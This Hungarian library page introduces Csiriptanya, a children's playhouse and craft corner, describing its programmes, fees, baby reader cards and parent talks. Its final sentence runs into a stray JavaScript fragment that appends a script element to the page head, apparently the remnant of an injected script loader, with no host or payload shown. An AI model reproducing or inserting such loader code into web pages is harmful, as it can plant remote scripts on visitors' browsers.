Csiriptanya page: Bemutatkozunk

[DEV: POST TYPE: page]

Csiriptanya  – Újra nyitva!

Újra megnyitotta kapuit a könyvtárunk harmadik emeletén található Csiriptanya. Igényesen kialakított mesés környezetben természetes anyagokból készült logikai-, képesség- és készségfejlesztő játékokkal várjuk a játékos kedvű érdeklődőket.

Kiemelten fontosnak tekintjük az olvasóvá nevelés támogatását, szeretnénk, ha a legkisebbeknek is természetes lenne a könyvtárba járás, egy-egy játszóházi látogatás alkalmával útba ejtenék a gyermekkönyvtári részlegünket és válogatnának mesekönyveink széles kínálatából.

A Csiriptanya programjait úgy állítottuk össze, hogy a gyermekek kreativitását, mozgásos és manuális képességeiket, logikájukat, képzeletüket, zenei – ritmusos kultúrájukat egyszerre fejlesszük. A foglalkozások közé kifejezetten írás-olvasás előkészítő feladatokat is becsempészünk, természetesen játékos formában.

A galéria részben kialakított Játszóházat bárki igénybe veheti, de az ingyenességet csak a könyvtári tagoknak tudjuk nyújtani. Gyermekeknek ingyenes a beiratkozás, így ez formaságnak tűnik, ugyanakkor a gyermek életében meghatározó lehet az első, és aztán sok éven tartó könyvtári tagság. (Nem könyvtári tagoknak 200 Ft/óra/gyermek)Már egészen pici, akárpár hónapos kortól be lehet iratkozni a könyvtárba, a baba-olvasók speciális olvasójegyet kapnak, ami kedves emlék lehet az első könyvtári tagságról, akár a Baba Naplóba is beragasztható.

A Csiriptanya földszintjére költözött a kézműves kuckó, ahol a kedd és a csütörtök délelőtt az előre bejelentett csoportoké, míg szombatonként minden érdeklődőt szeretettel várunk a hónapról – hónapra meghirdetett témákhoz kapcsolódó kreatív foglalkozásokra. Fontos szempont, hogy a játékos tanulás segítségével a foglakozásokon előkészítsük az írás-és olvasástanulást, fejlesszük a koncentrációs és gondolkodási képességeket.

A Csiriptanya olyan játszóház, ahová gyermeket és szülőt egyszerre várjuk, közös kikapcsolódásra, közös játékra ösztönző körülmények közé. Kifejezetten a szülők számára indítjuk útjára 2014-ben azt a programsorozatot, amelyben hónapról-hónapra a szülőket leginkább foglalkoztató témákat járunk körbe, mint pl.: Hogyan/ mit játsszak a gyermekemmel? Milyen a jó játék? Milyen a jó mesekönyv? Mikor és mit olvassak a gyermekemnek?

Visszajelzéseiket, ötleteiket várjuk a csiriptanya@mzsk.hu e-mail címre!

Kellemes kikapcsolódást kívánunk!d.getElementsByTagName(‘head’)[0].appendChild(s);

^ Tetejére